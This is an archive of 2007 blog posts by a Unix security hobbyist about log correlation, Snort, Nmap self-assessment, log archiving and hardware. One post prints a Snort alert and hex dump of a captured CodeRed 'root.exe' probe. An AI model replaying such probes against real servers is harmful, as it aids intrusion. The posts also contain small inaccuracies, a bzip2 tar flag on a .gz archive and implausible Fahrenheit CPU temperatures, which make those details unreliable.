Sep 12 17:29:14 starchild kernel: Connection attempt (UNPRIV): IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:0c:db:f5:90:00:08:00 SRC=12.123.12.123 DST=66.160.141.30 LEN=60 TOS=0x00 PREC=0x00 TTL=56 ID=20255 DF PROTO=TCP SPT=53355 DPT=1986 WINDOW=5840 RES=0x00 SYN URGP=0
Sep 12 17:29:24 starchild kernel: Connection attempt (PRIV): IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:0c:db:f5:90:00:08:00 SRC=12.123.12.123 DST=66.160.141.30 LEN=60 TOS=0x00 PREC=0x00 TTL=56 ID=28213 DF PROTO=TCP SPT=38543 DPT=978 WINDOW=5840 RES=0x00 SYN URGP=0
Sep 12 17:29:24 starchild kernel: Connection attempt (UNPRIV): IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:0c:db:f5:90:00:08:00 SRC=12.123.12.123 DST=66.160.141.30 LEN=60 TOS=0x00 PREC=0x00 TTL=56 ID=10244 DF PROTO=TCP SPT=45624 DPT=11371 WINDOW=5840 RES=0x00 SYN URGP=0
Sep 12 17:29:37 starchild kernel: ICMP-request: IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:0c:db:f5:90:00:08:00 SRC=12.123.12.123 DST=66.160.141.30 LEN=28 TOS=0x00 PREC=0x00 TTL=42 ID=53002 PROTO=ICMP TYPE=8 CODE=0 ID=10683 SEQ=16615
Sep 15 17:38:25 starchild sshd[8455]: Accepted publickey for ron from ::ffff:12.123.12.123 port 33557 ssh2
Sep 15 23:21:08 starchild kernel: ICMP-request: IN=eth0 OUT= MAC=fe:fd:40:3e:e7:dc:00:0c:db:f5:90:00:08:00 SRC=12.123.12.123 DST=66.160.141.30 LEN=84 TOS=0x00 PREC=0x00 TTL=55 ID=40988 PROTO=ICMP TYPE=8 CODE=0 ID=614 SEQ=0

Quite a bit of stuff, huh? This looks to be a port scan! This is something that we didn't see in the Apache logs! Good thing we checked! Looks like this IP needs to be blocked with IPTables (which we won't do in this exercise).

Sadly, nothing shows in the Modsecurity logs, but we've enough information already. What about Snort? Because I've PCAP files, the search becomes a bit more involved. I'll spare the intimate details, but this is what we see:

[**] [1:1256:9] WEB-IIS CodeRed v2 root.exe access [**]
[Classification: Web Application Attack] [Priority: 1]
09/15-23:34:35.708546 0:C:DB:F5:90:0 -> FE:FD:40:3E:E7:DC type:0x800 len:0xB0
12.123.12.123:52753 -> 66.160.141.30:80 TCP TTL:56 TOS:0x0 ID:51589 IpLen:20 DgmLen:162 DF
***AP*** Seq: 0xAF32BB68 Ack: 0x3F319F7A Win: 0xFFFF TcpLen: 32
TCP Options (3) => NOP NOP TS: 288652007 1521931210
[Xref => http://www.cert.org/advisories/CA-2001-19.html]

23:34:35.708546 00:0c:db:f5:90:00 > fe:fd:40:3e:e7:dc, ethertype IPv4 (0x0800), length 176: IP (tos 0x0, ttl 56, id 51589, offset 0, flags [DF], length: 162) 12.123.12.123.52753 > 66.160.141.30.80: P [tcp sum ok] 2939337576:2939337686(110) ack 1060216698 win 65535
0x0000: fefd 403e e7dc 000c dbf5 9000 0800 4500 ..@>..........E.
0x0010: 00a2 c985 4000 3806 56c0 47b2 0aa0 42a0 ....@.8.V.G...B.
0x0020: 8d1e ce11 0050 af32 bb68 3f31 9f7a 8018 .....P.2.h?1.z..
0x0030: ffff e9c5 0000 0101 080a 1134 7ae7 5ab6 ...........4z.Z.
0x0040: d3ca 4745 5420 2f72 6f6f 742e 6578 6520 ..GET./root.exe.
0x0050: 4854 5450 2f31 2e30 0d0a 5573 6572 2d41 HTTP/1.0..User-A
0x0060: 6765 6e74 3a20 5767 6574 2f31 2e31 302e gent:.Wget/1.10.
0x0070: 320d 0a41 6363 6570 743a 202a 2f2a 0d0a 2..Accept:.*/*..
0x0080: 486f 7374 3a20 7769 6767 6c69 742e 6174 Host:.wigglit.at
0x0090: 682e 6378 0d0a 436f 6e6e 6563 7469 6f6e h.cx..Connection
0x00a0: 3a20 4b65 6570 2d41 6c69 7665 0d0a 0d0a :.Keep-Alive....

The first is the Snort alert file...this is a fast alert, with minimal detail (no packet capture). The second section is the full alert, including packet capture. It is also garbled (due to the hex code and the fact that this blog has issues with formatting) Note that my logs show no response. Apparently, my Snort install doesn't have a 404 signature. Again, the fact that we can correlate helps me when my Snort install lacks the data that I may have needed. I was able to look at the Apache logs to see the 404 when my Snort logs didn't show the return traffic.

Well, this concludes our chat about correlating existing logs. Note that any log files can be correlated. Correlation can also assist in tracking down network issues or issues with, for instance, a faulty Snort install (ahem). Although this discussion focused more on security, hopefully this helps someone understand their network or software architecture also.

`

Assessment of a Hardened Box

2007-09-12T20:09:00.000-04:00

I thought I'd do a piece on *nix security. This will be a general guide on how to determine what ports have listening services and how to assess if those ports are available to the world wide web.

I like to do three different things:

1. Run Nmap against localhost (127.0.0.1).
2. Run Nmap against the machine's IP from another machine within the LAN.
3. Run Nmap against the machine from the internet.

Running Nmap against localhost can be deceiving, as the ports that are listening on the machine may not actually available to another machine, on or off the LAN. Note that 127.0.0.1 only pertains to the local machine. This is the loopback address that every machine uses to communicate to itself. I'll compare a localhost scan against a scan that was conducted from another machine on the LAN.

I'll scan localhost first:

-su-2.05b# nmap localhost

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2007-09-12 17:20 EDT
Interesting ports on localhost.home (127.0.0.1):
Not shown: 1674 closed ports
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
3306/tcp open mysql
5801/tcp open vnc-http-1
5901/tcp open vnc-1
6001/tcp open X11:1

Nmap finished: 1 IP address (1 host up) scanned in 10.662 seconds

Now, I'll scan the machine's IP from another machine:

root@slackbox:~# nmap 10.150.1.103

Starting Nmap 4.20 ( http://insecure.org ) at 2007-09-12 17:36 EDT
Interesting ports on delly (10.150.1.103):
Not shown: 1693 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
5900/tcp closed vnc
MAC Address: 00:C0:4F:61:28:1F (Dell Computer)

Nmap finished: 1 IP address (1 host up) scanned in 22.277 seconds

Comparing the two scans, some things are readily apparent: port 25/tcp and 5801/tcp, 5901/tcp, and 6001/tcp are listening on the loopback device, yet they aren't listening on IP that is assigned to the machine. Also, note that certain ports are bound to the IP but not the loopback. The more important aspect of these two scans is the services listening on a non-loopback address, because services use IPs to communicate to other machines, not loopback devices.

So, TCP ports 25, 5801, 5901, and 6001 appear to be open. We can test this. Remember, we're concerned about whether these ports can be seen as open to the internet. We'll test this by using telnet. Below, I'm logged into another machine and attempting to telnet on port 25 to the machine we Nmap'd on localhost:

root@slackbox:~# telnet 10.150.1.103 25
Trying 10.150.1.103...
telnet: connect to address 10.150.1.103: Connection timed out

The connection timed out. It is pretty evident that the machine doesn't have services on 10.150.1.103:25 that just anyone can reach.

We can also test by running 'netstat -an' on the machine. Whle netstat doesn't connect to the port in question, it does indicate what interface services are using:

-su-2.05b# netstat -an | grep -i listen
tcp4 0 0 *.5801 *.* LISTEN
tcp4 0 0 *.5901 *.* LISTEN
tcp4 0 0 *.6001 *.* LISTEN
tcp4 0 0 *.3306 *.* LISTEN
tcp4 0 0 10.150.1.103.8118 *.* LISTEN
tcp4 0 0 10.150.1.103.80 *.* LISTEN
tcp4 0 0 127.0.0.1.25 *.* LISTEN
tcp4 0 0 *.22 *.* LISTEN
tcp6 0 0 *.22 *.* LISTEN

See port 25? What IP address is assigned to the service? Loopback! This means that this service isn't exposed to any other machine on the LAN or internet. The other services are listening (for example, *.22) but the '*' usually means that the service is assigned to an interface (which may have a number of IPs assigned to it). Ports 80 and 8118 have an IP assigned to the service, instead of '*'. This means that only IP 10.150.1.103 is assigned to that interface. Ports 80 and 8118 also do not show up when scanning localhost, but yet I can telnet to port 80 and 8118 when using the telnet command (and also browser), using 'telnet localhost 80' or 'telnet localhost 8118'. Port 80 is a web server. Port 8118 is a Privoxy proxy. The reason is probably because my PF install on that machine filters some loopback traffic. If I scan the IP of the machine, port 80 is then detected. The reason is because PF is configured to allow port 80 traffic to/from 'slackbox' from/to 10.150.1.103.

All of this is very elaborate. Everything has to be taken into consideration: what the firewall does/doesn't allow; what services run on 127.0.0.x; what services run on interfaces; what services run on IP addresses.

The last thing we'll do is scan the LAN from the internet. The results will be determined by what ports the gateway router/firewall are forwarding to machines within the LAN. For example, I know I've port 22/tcp open to the world because I've told my gateway firewall to forward any traffic on 22/tcp to 10.150.1.103. I also don't allow much else and also allow some traffic to be forwarded to different machines within the LAN. So, when a scan is being conducted from the outside, the whole LAN's security posture is taken into account. Now, let us scan from the internet:

Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on pool-xx-xxx-xx-xx.washdc.fios.verizon.net (xx.xxx.xx.xxx):
(The 1599 ports scanned but not shown below are in state: filtered)
Port State Service
22/tcp open ssh
3306/tcp open mysql

NICE! Of all the scans we've conducted thus far, this is the one that is important. The other scans paint the smaller picture, but this one puts it all together and is THE security assessment that one wants to conduct. So, you can see, ports 22 and 3306 are open to the world. This could be two different machines that need those ports open to the internet, or this could be one machine that has those two ports open to the world wide web. Note that while I can reach those ports, my firewall is configured to allow communication from the machine I scanned from. If a machine, from Google.com or any other IP/domain that is not accounted for within the FW policy, attempted the same thing, those ports wouldn't show as opened, as the firewall would drop the traffic. So, while the two ports appear to be open to the world in the above results, they actually aren't, as the traffic is being filtered.

I hope all of this has helped some in understanding security and how to assess your LAN gateway and hosts within the LAN. We've used Nmap, telnet, and netstat to determine the security posture of a given machine. There are other tools that I didn't mention for brevity, (such as socklist, tcpdump, snort, for example) but Unix and Linux machines offer much in the way of testing security of a machine.

`

Archiving Logs

2007-09-05T22:11:00.000-04:00

I've logs that I gather and put into a directory named /home/status. There's a script that runs commands and directs the output to files within this directory. The script runs every hour of every day. The output is dumped into a directory akin to "070101/", which means 2007-01-01. Each directory would have 24 files. I periodically archive these (by year) into tar.gz files.

Here's how the directory looks:

root@starchild:/home/status/070101# ls
070101.00.starchild.txt 070101.04.starchild.txt 070101.08.starchild.txt 070101.12.starchild.txt 070101.16.starchild.txt 070101.20.starchild.txt
070101.01.starchild.txt 070101.05.starchild.txt 070101.09.starchild.txt 070101.13.starchild.txt 070101.17.starchild.txt 070101.21.starchild.txt
070101.02.starchild.txt 070101.06.starchild.txt 070101.10.starchild.txt 070101.14.starchild.txt 070101.18.starchild.txt 070101.22.starchild.txt
070101.03.starchild.txt 070101.07.starchild.txt 070101.11.starchild.txt 070101.15.starchild.txt 070101.19.starchild.txt 070101.23.starchild.txt
root@starchild:/home/status/070101#

Here are the archives I currently have:

root@starchild:/home/status# du -h sensorstat_logs-200*
748k sensorstat_logs-2005.tar.bz2
3.5M sensorstat_logs-2006.tar.bz2
7.3M sensorstat_logs-2007.tar.gz
root@starchild:/home/status#

This is a listing of the month of January (unarchived):

root@starchild:/home/status# ls -l | grep 0701
drwxr-xr-x 2 root root 4096 Jan 1 2007 070101/
drwxr-xr-x 2 root root 4096 Jan 2 2007 070102/
drwxr-xr-x 2 root root 4096 Jan 3 2007 070103/
drwxr-xr-x 2 root root 4096 Jan 4 2007 070104/
drwxr-xr-x 2 root root 4096 Jan 5 2007 070105/
drwxr-xr-x 2 root root 4096 Jan 6 2007 070106/
drwxr-xr-x 2 root root 4096 Jan 7 2007 070107/
drwxr-xr-x 2 root root 4096 Jan 8 2007 070108/
drwxr-xr-x 2 root root 4096 Jan 9 2007 070109/
drwxr-xr-x 2 root root 4096 Jan 10 2007 070110/
drwxr-xr-x 2 root root 4096 Jan 11 2007 070111/
drwxr-xr-x 2 root root 4096 Jan 12 2007 070112/
drwxr-xr-x 2 root root 4096 Jan 13 2007 070113/
drwxr-xr-x 2 root root 4096 Jan 14 2007 070114/
drwxr-xr-x 2 root root 4096 Jan 15 2007 070115/
drwxr-xr-x 2 root root 4096 Jan 16 2007 070116/
drwxr-xr-x 2 root root 4096 Jan 17 2007 070117/
drwxr-xr-x 2 root root 4096 Jan 18 2007 070118/
drwxr-xr-x 2 root root 4096 Jan 19 2007 070119/
drwxr-xr-x 2 root root 4096 Jan 20 2007 070120/
drwxr-xr-x 2 root root 4096 Jan 21 2007 070121/
drwxr-xr-x 2 root root 4096 Jan 22 2007 070122/
drwxr-xr-x 2 root root 4096 Jan 23 2007 070123/
drwxr-xr-x 2 root root 4096 Jan 24 2007 070124/
drwxr-xr-x 2 root root 4096 Jan 25 2007 070125/
drwxr-xr-x 2 root root 4096 Jan 26 2007 070126/
drwxr-xr-x 2 root root 4096 Jan 27 2007 070127/
drwxr-xr-x 2 root root 4096 Jan 28 2007 070128/
drwxr-xr-x 2 root root 4096 Jan 29 2007 070129/
drwxr-xr-x 2 root root 4096 Jan 30 2007 070130/
drwxr-xr-x 2 root root 4096 Jan 31 2007 070131/

The command I use to archive the directories within /home/status is:

tar cvjfp sensorstat_logs-2007.tar.gz .

c - creates the archive
v - verbose output once the command is run (this isn't needed, but I like to see what the command is doing.
j - compresses archive
f - uses a file name
p - preserves permissions of files within archive

The "." at the end of the command directs the command to archive everything within the current directory.

Once the files are archived, I can get rid of them using the 'rm' command to free up some space.

I thought all of this would be cool to share...

Posted: Snort init script

2007-08-30T13:17:00.000-04:00

Here it is!

#!/bin/sh
# Start/stop/restart snort.

# 8/30/2007 - The snort_restart function wasn't working, but an investigation ferretted out the problem: the "sleep" parameter was adjusted from "1" to "5" to give the process time to stop before starting the snort process again.

# Start snort:
snort_start() {
if [ -x /usr/local/bin/snort ]; then
echo "Starting snort daemon: /usr/local/bin/snort -devXz -c /home/snort/snort-2.6.1.1/snort.conf -i eth0"
/usr/local/bin/snort -devXz -c /home/snort/snort-2.6.1.1/snort.conf -i eth0 -D
fi
}

# Stop snort:
snort_stop() {
echo "Stopping snort daemon"
killall snort
}

# Restart snort:
snort_restart() {
snort_stop
sleep 5
snort_start
}

case "$1" in
'start')
snort_start
;;
'stop')
snort_stop
;;
'restart')
snort_restart
;;
*)
echo "usage $0 start|stop|restart"
esac

Snort Died...

2007-08-28T15:10:00.000-04:00

It died after the creation of the new script...

The only thing I can find is the following:

Aug 27 22:34:38 starchild snort[5941]: Snort exiting

This SUCKS!

I've restarted it but I now lack visibility for the past 12+ hours. I'll watch the logs closely tonight and maybe direct any errors to a logfile.

Edited 8/30/2007:

I think I've fixed the issue (for real, this time).

There is an part of the script that would choke upon itself...the restart function:

# Restart snort:
snort_restart() {
snort_stop
sleep 5
snort_start
}

I had to change the sleep statement from "1" to "5". I believe that the script chokes because it takes a few seconds to stop the snort process. One second isn't enough time, it seems. The script was stopping the process and immediately restarting it after one second. One second after the kill command runs, the snort process is still trying to stop when the script starts the snort_start function. I've tested this by adjusting the sleep statement and running the "rc.snort restart" command...I got successful results. We'll now wait to see if the cron job croaks again (tonight).

Sophos Vulns

2007-08-27T15:15:00.000-04:00

I saw this at an internal website (internal to my work):

Two vulnerabilities in Sophos’ anti-virus software for Microsoft Windows and Unix/Linux, will allow an attacker to remotely inject arbitrary code and also produce a Denial of Service (DoS) attack. Any version prior to 2.48.0 is affected. Please follow the links below for remediation.
http://www.heise-security.co.uk/news/94954
http://www.frsirt.com/english/advisories/2007/2972
http://www.sophos.com/support/knowledgebase/article/28407.html

This reminds me that the FAA is running Sophos AV clients on both their Windows and *nix IDSs...its stupid to even run AV on a machine that is dedicated to IDS, but I thought about them nonetheless...heh.

Edited on 8/28/2007:

I wanted to elaborate on my comments.

There's are several reasons why you shouldn't run AV on security devices:

1. The AV solution may have zero-day vulnerabilities. Sure, you can block off all attempts against the management interface of the IDS device, but why even set yourself up to a possible compromise of a critical piece of architecture?

2. AV (and firewall...yes, both installed on an IDS in the FAA's case...I'm not BSing) solutions usually demand quite a bit of system resources. IDSs usually demand major system resources also. The two will eventually bump heads, unless the IDS is seeing no traffic (which, IMO, means that the IDS is worthless or may need its sniffing interface to be placed at a more critical location).

3. Just because NIST recommends a certain security posture doesn't mean that their recommendations should be applied blindly (yes, I'm talking about the FAA). I'm also aware that the Department of Transporation (which FAA falls under) demands this ridiculous requirement. Managers should question anything that isn't apparent in guidelines from higher headquarters...to not do so is to admit that you are a follower and not a 'do-er'.

I say these comments because I worked with the FAA for awhile and certainly didn't like their way of thinking, but I worked there (as a contractor, which didn't help my situation much) and just took what was dished to me. After several years of wondering if I should've voiced my opinion more strongly before leaving their organization, I'd have maybe actually taught their management and DOT's management some things about REAL security and how their security professionals SHOULD operate. All I can say now is that I now know (and experienced) what NOT to do, especially as a security professional.

Bud, if you're reading this, know that I'm in a far better place and while I wish my friends still working there well, I do know that I will never ever be the type of person that put up with sub-par management and sub-par decision-making. I'm certainly working in a better place, but I'd like to thank you for making me a better person...you did make me better at knowing idiots when I see them. IDSs and firewalls on IDS devices...hahahaha!

Revamped rc.snort on my server

2007-08-26T22:36:00.000-04:00

Hi all!

First, I've redone my rc.snort file. I looked at the existing rc files in /etc/rc.d/ and looked at rc.sendmail specifically. It looked very simple compared to the rc.snort I did awhile back. Remember when I mentioned that I did two of them, one for Slackware 9.0 and one for OpenBSD 3.8, with the OpenBSD one working fine but the Slackware one not working 100%? Well, instead of basing the Slackware rc.snort from Slackbuilds' thttpd rc script, I went ahead and did the following:

1. I changed the name of the existing rc.snort to rc.snort.original using the 'mv' command.

2. I executed the following: cp rc.sendmail rc.snort

3. I edited rc.snort with VIM, replacing all mentioning of sendmail with snort, also including the path of snort.

4. I then tested by manually starting, stopping and restarting a running snort process. I found that the script was choking because I forgot to add the '-D' switch to the script. I fixed this and tested successfully.

5. I lastly set a cronjob to run 5 min in the future to test that the cronjob would function using the new script. It worked!

I should've done the above AGES ago. Now I get to wait a few days to see if the cronjob fails because I haven't accounted for something else...that's what happened last time. I think I'm not going to have issues this time, though.

I'll link the revised rc.snort script a bit later.

I've also built two netcat Slackware packages, using Checkinstall. I built one for my 9.0 server and one for my v12.0 workstation. Everytime I build a package, I'll be adding it to my slackpack repository, which will have v9.0 and v12.0 directories. I've added it because I didn't find a slackpack of netcat hosted anywhere else. I've the feeling that people may want the version for 12.0. I don't think many people are using v9.0 anymore.

You are probably wondering why I'm using v9.0. Because that's what my hosting provider offers. I try to keep it up-to-date but I've noticed that Pat isn't upgrading packages that far back anymore. This means I'll have to build my own upgrade packages. This also means I'll have to be very attentive to security (like I'm not already). Additionally, this will soon force me to either upgrade to v12.0 (Linode has several howtos) or jump to another distribution for simplicity-sake. :(

Anyways, I just wanted to post since I've been doing some work with Slack.

Until next time...

Latest Happenings...

2007-07-30T17:57:00.001-04:00

Hey all...it's been awhile.

What's been happening? I've upgraded my Slackware machine to v12.0, wiping my partitions and doing a fresh install. Why? I'd been upgrading my Slack install since v10.0 and the install was becoming rather stagnant, so I backed up the important things and did a reinstall with little issues. I'm not quite done setting things up yet (like grabbing the latest graphics drivers (Nvidia) and testing compiz). I'm quite happy with v12.0, although I've got my work cut out for me concerning learning the differences between this version and the last...I know there were some rather substantial changes, from what I've heard.

What else have I been doing? Devlving in FreeBSD and OpenBSD a bit more. I've converted my FreeBSD machine's firewall from ipf to pf. The .conf files use similar syntax but the command structure is quite different, along with the number of functions that pf can perform. pf appears quite a bit more robust than ipf...ipf appears to be a minor reflection of pf. I'm definitely learning things, but the machine that pf is running on only serves SSH connections, but that's quit enough for me at this point in time.

I've also decided to reflash my Linksys router to an opensource firmware called Tomato. It runs on the WRT54G/GS, some Buffalo, and Broadcom-based routers. It appears very robust and easy to set up. It is also easy to revert back to the original firmware. I recommend giving this one a shot. It is not meant to be something akin to OpenWRT or similar...it's designed to be and stay light and fast, which it is, but is also has plugins for functionality that may be mandatory for the above-average hacker.

I've also just returned from vacation in California. I think I may end up buying a home there, near the San Diego area, as that place is so much different than where I'm at now, plus we'll be close to relatives and nice vacation sites. I just have to start conducting employment research so I can see what that area can offer me, employment-wise. It may mean me going to a different part of the IT arena (sysadmin or something similar). I don't mind changing my job a bit, as long as I stay in some type of management position.

What projects do I have or plan on conducting? I intend to clean up my office and turning off some hardware or consolidating some server duties, because my office looks like a rat's nest. It's partly because there are no power outlets in my office (!!). Yeah, I'm renting and the prior owners finished the basement but appeared to be in such a rush that they neglected to put the power outlets back in place. I think I can do one (maybe with my father's help)...one may be enough. Right now, I've a beefy power cord running from the storage area to my office space...everything is attached to that one strip (yeah, a bit dangerous, but I spend a bit of money on beefy surge protection).

Well, I think this post more than makes up for the last few weeks/months of non-activity. I shall try to be more vigilant in posting in the future (famous last words).

Snort init script still not working...

2007-06-04T10:28:00.000-04:00

Yeah, I thought I'd nailed this, but there is still an issue with my Slackware machine's Snort startup/shutdown script. For some reason, it'll start fine, will not shut down cleanly and will error out. The script will not start on its own and requires manual intervention (dunno why). I'll have to add some debugging code to it so that I can track the issue. It must be some flag that I'm using when implementing 'ps', because that's the only difference between the two scripts (the OpenBSD and Slackware).

I wish I had more time (and willpower) to give this the attention that it needs. I can always visit the Snort mailing list and post my concerns, but I'd like to be able to nail this one myself. :)

Vrtservers.net - Malicious IP scanning

2007-06-04T10:13:00.000-04:00

IP 64.56.65.150, an IP that belongs to Vrtservers.net, has been very active lately. The machine has been compromised twice in 30 days and does a multitude of scans. Last month I reported this IP to isc.sans.org and the machine was eventually taken offline (after waiting over two weeks). I reported it again this weekend when I noticed the IP was scanning against port 80 on my public server.

I've attempted to do some digging via Google but have found nothing solid, other than finding people's web stats highlighting this IP. This post's intention is to let people know that this IP has a history of being compromised.

Putting the IP into web-sniffer.net shows the following:

**I'll capture a screenshot when I can, as the Blogger console attempts to render the data as HTML**

That's not good. Using Links (a text-based browser that is good to use
when you're afraid to visit a webpage with IE or Firefox), the .txt files
appear to be IPs that are being harvested for further exploitation.

I'm thinking of reporting this IP to the US-CERT, since SANS isn't being
proactive.

I Created some scripts for Snort

2007-05-19T19:22:00.001-04:00

I've created (well, modified) a Snort initialization, restart, and shutdown script for Slackware and OpenBSD. They are linked below.

The OpenBSD script works solidly.

The Slackware script works sporadically and I've no idea how to debug it (although I haven't tried 'strace' yet). It appears to work manually every time, but when run as a cron job, it's sometimes, seemingly randomly, doesn't restart. The cron job runs every hours but because it sometimes doesn't start, I now have holes in my website's IDS coverage.

Note that I didn't HAVE to create start/stop scripts for Snort, as I could've started Snort by utilizing the rc.local file, but I'd have still had to manually kill the Snort process whenever I wanted to stop Snort. Having an init script do this is much cleaner.

The fact that I've gotten it working on the OpenBSD machine hints that I've a minor issue with the Slackware script that I have yet to account for, but its frustrating me, so I'll throw it online to see if someone can help with debugging. Yeah, I'd searched for help via Google but didn't see much of Snort init scripts for Slackware (although I may find something if I look at any scripts for other distributions).

I also got Snortalog to process my Snort raw logs into a statistical report, although I had to import 6.2MB of flat files to my FreeBSD box (which Snortalog is installed on), then have Snortalog crunch that data into a HUGE (3.9MB) HTML file! Needless to say, that HTML file takes almost 5 minutes to load into a browser. I've got to filter the logs and only have it crunch certain dates to make the file less bulky.

Snortalog definitely highlights that I could do some tuning, as it shows a very high amount of MS-SQL worm attempts (MS Blaster) hitting my server, amongst other things. This is a good tool that I'd previously used (and had forgotten) at a prior place of employment. It would be nice if I could figure out how to get it to crunch my IPF FW logs.

Another oldie but goddie is SnortSnarf. It is a perl script, as is Snortalog, that parses Snort files (the alert file and the payload files) into readable HTML pages, which is a bit better at searching via command-line. It is not as handy as ACID/BASE is, though, but has lower overhead. Sadly, SnortSnarf's home page is gone, but I've linked Snort.org's archive.

EDIT --

I've found my 'error'. What happened was that I had line 34 commented out and line 35 uncommented. Line 35 is specifically for usage with OpenBSD. Line 34 is specifically for Slackware. I rectified this by uncommenting line 34 and commenting line 35. I'll also put commentary explaining this. Consider this issue solved!

Edited 8/30/2007:

Revised Script that works! *yes, click here*

Power outage

2007-05-13T20:58:00.000-04:00

The other day, I awoke to find most of my machines had rebooted, although not all did. This indicates a brown-out or power flux. I had to intervene because the machines didn't come up cleanly, as some hung at the BIOS checks.

I've fixed one...it wasn't detecting the DVD burner and I don't know why. The other is an old box that has an intrusion detection feature that continues to tell me that the case was recently opened.

Lastly, my Slackware box would NOT boot cleanly, as somehow the filesystem got borked. I had to manually check the filesystem and repair it before it would boot cleanly...this took a few days. Until then, this box was officially down.

I think it's time to invest in a UPS.

Pidgin and Slackware relationship ended

2007-05-13T13:59:00.001-04:00

http://www.linuxquestions.org/questions/showthread.php?t=553262

Total B.S. A good read, especially if you're a Slacker! I'm backing Pat totally on this one.

Backtrack v2.0

2007-04-21T16:33:00.000-04:00

I'd recently wiped my installation of Slackware 10.2 from my Toshiba Satellite 1805-S274 in favor of a security-oriented live distro that I could install onto the laptop's drive. I opted for Hakin9, a distro based on Aurox.

Hakin9 is now based on Aurox v12.0, which is based on FC5. It was nice but I ran into issues. My first issue was that I used an older version that was included in an old issue of Hakin9 magazine. I checked their latest magazine and it was apparent that they'd been using an OLD version of Aurox when building their distro. I got a more recent version and it installed successfully. While testing Aurox (I believe v12), it was apparent that the setup would run optimally on a recent laptop, while it was overheating mine. I didn't feel like delving internally into the settings and downloading packages that would enable me to use Fluxbox instead of KDE, so I decided to try another distro.

My next choice was Backtrack v2.0. I was very impressed with the live CD, so I took the next step of installing to hard disk. The install was MUCH quicker than Hakin9. I'm also partial to Slackware and Backtrack is Slax-based. Backtrack is a merge of the Whax and Auditor security/penetration-testing distributions.

My only issue with Backtrack is the fact that there's no software repository for updating all the security tools. Slackware has third-party package management that can be used in Slax and Backtrack, but my thoughts are that when updating Nessus, for instance, the dependencies that were originally installed may need to also be updated, which is fine, but which could be a bit tedious. The install of Backtrack was quick enough to where I could just manually upgrade what I need upgraded then reinstall the distro when new versions are released.

This distribution is solid!

The beast is built and running!

2007-03-16T01:23:00.000-04:00

I finished building the new system last week (Thursday). I ran into a few issues:

1. The mainboard was apparently dead out-of-the-box, as none of the IDE channels appeared to work. I tried various configurations and various drives that were confirmed as working. I was unable to get anything to work, yet I could boot a Linux Live CD.

2. The power cables on the power supply had weird endings that initially looked like they wouldn't fit on the motherboard's sockets. I then looked closely and found that the cable sockets could be split (at least the 24-pin and 8-pin could).

3. I've been trying to determine what to put on this beast as an OS. Right now I have WinXP so that I could evaluate the high-end games that I have (BF 2142 and such) and would love to be able to run an OS that will detect and utilize both of the CPU's cores. [Note: WinXP Pro does this, and I'm also using that version.]

The case is very nice and has a see-through side. The hardware runs really good. I bumped up the eye-candy in BF 2142 so I could get a decent evaluation of how hot the CPU would get (I haven't even tried to see how many framerates per second the vidcard may do. Idle, I get around 40-45F. During gaming with eye-candy maxxed out (in BF 2142), I get 54F max. This isn't bad but I've heard of people getting even lower temps than 54F. This tells me that I may need a few case fans (I've none, so far) and maybe need to hide cabling. I've a very thin coating of Arctic Silver on the CPU, and I'm sure that's helping. What I haven't done is check to see if anyone has posted temps using the same CPU and case. I'll search for that info soon.

I'm very happy with the set up and will most likely mess with RAID next (I'll require another hard disk), after getting more case fans and possibly more RAM.

System Components

2007-02-24T17:42:00.000-05:00

Three system components are shipped so far:

Ultra XBlaster Clear Side Blk Mid-Tower Case
Ultra 500W X-Finity Power Supply 120mm Fan
Ultra 1024MB PC4200 DDR2 533MHz

The real worry was the RAM, as it was listed as out-of-stock after I made the purchase. Hopefully, the 6 other components will be shipped on Monday.

I've about $120 in rebate paperwork to complete and one of them must be postmarked by tomorrow at midnight...dunno how that's gonna happen on a Sunday.

Anyways, I'm very excited about this computer's potential and can't wait to get everything assembled and working.

I'll keep you all informed as the days go by.

Ordered a new system last night

2007-02-23T12:10:00.000-05:00

Since its been awhile since I've built a new machine and since I wanted a taste of 64-bit and dual core technology, I purchased this last night:

ECS nForce 570 SLIT-A v5.1 Socket 775 Barebone Kit / Intel Pentium D 830 OEM / 250GB SATA HDD / 18x DVD±RW DL / 1GB DDR2 PC4200 / CPU Fan / ATX Mid-Tower Case / 500 Watt Power Supply

Additionally, I bought an EVGA GeForce 7300 GT video card with 512MB PCIe, DVI, and HDTV, since the new system will require a PCIe video card, which I don't have.

I think I've accounted for everything when buying this system, hardware-wise. I'll utilize a KVM, so I won't need another keyboard/mouse for it.

Software-wise, I'll most likely be putting some form of Windows on this system. This system will be using newer technology that *nix may or may not fully support and my troubleshooting time is limited. So, I guess I'm in the market for a 64-bit OS. I don't trust Vista yet, so I'll see about getting the 64-bit version of Windows XP Professional.

This WILL be a gaming rig, but I'd also like to try my hand at 64-bit Linux when I've a bit more free time available, so eventually, it may turn into a dual-boot system. What flavor of Linux? Something that won't take long to get running and will be low maintenance, so it won't be Slackware-based, most likely, unless Zenwalk or something similar supports 64-bit Intel dual core CPUs. Hopefully Pat can look into either factoring in 64-bit support in Slackware or sanctioning and supporting Slamd64 in a way that will make it easier to use.

So, I guess I've a 1 to 3 week wait for all these parts to come in, so I can build this system. The case and power supply are on the way now, but the other parts are still in the queue with no update, with the exception of the RAM, which is on back order. Hopefully, they'll get 'un-backlogged' soon.

Did some ##slackware log archiving...

2007-02-17T23:34:00.000-05:00

Yeah, I had to do some archiving of the logs, as diskspace usage was at 96%. I didn't just archive the channel logs, but also archived my snort and web logs. About the only thing I haven't archived yet are the modsecurity logs (will do that sometime this weekend). Currently, the host's drive space is currently at 74%. The channel logs are still in place, but I've crunched the logs into monthly tar.bz2 files. This renders the logs unsearchable by google (yeah, this sucks), but I had to compromise...they are still downloadable, just not searchable. So, if you need them, they are there for download. Once you download them, you can grep each tar.bz2 after uncompressing them. Hopefully, Google still has the logs cached so that a person searching for an item can still see the cached files. Maybe I'll purchase more drive space so that I can host the logs in an untarred and uncompressed format in the near future.

